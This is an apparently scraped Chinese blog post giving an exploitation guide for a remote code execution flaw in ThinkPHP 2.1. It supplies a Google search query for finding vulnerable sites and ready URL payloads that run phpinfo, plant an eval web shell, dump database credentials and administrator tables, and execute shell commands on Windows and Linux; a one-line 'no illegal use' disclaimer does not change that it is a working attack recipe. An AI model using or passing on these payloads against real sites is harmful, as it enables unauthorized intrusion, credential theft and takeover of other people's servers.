Thinkphp2.1漏洞利用

thinkphp2.1版本

Google语法:

inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

进行测试,输出phpinfo

Index/index/name/$%7B@phpinfo%28%29%7D

Thinkphp2.1漏洞利用

输出版本信息:

index.php/module/action/param1/${@print(THINK_VERSION)}

Thinkphp2.1漏洞利用

写入一句话

index.php/module/action/param1/${@print(eval($_POST[c]))}

 Thinkphp2.1漏洞利用

 

 一些其他执行语句:

1.使用c方法,获取其他数据库 配置相关信息:c(db_name)、c(db_host)、c(db_user)、c(db_pwd)等 

/index.php/module/action/param1/$%7b@print(c(db_name))%7d

3.使用d方法或者m方法,查询其他数据库 ,最典型的使用方式var_dump(d(admin)->select()),能够查询出管理员信息,当然,表名需要猜一下,一般是admin,user等

/index.php/module/action/param1/$%7b@print(var_dump(d(admin)->select()))%7d

4.利用php在“·”(tab键上面的键,url编码后为%60)之间的内容可以当做命令执行的方式,不管是windows还是linux下,都可以执行cmd或者是shell命令。

index.php/module/action/param1/$%7b@print(%60dirls%60)%7d  ---------- 在windows下

index.php/module/action/param1/$%7b@print(%60ls%60)%7d -------------在linux下
上一篇:【LeetCode】50. Pow(x, n)(Java)


下一篇:2D Circular Geometry Kernel ( Geometry Kernels) CGAL 4.13 -User Manual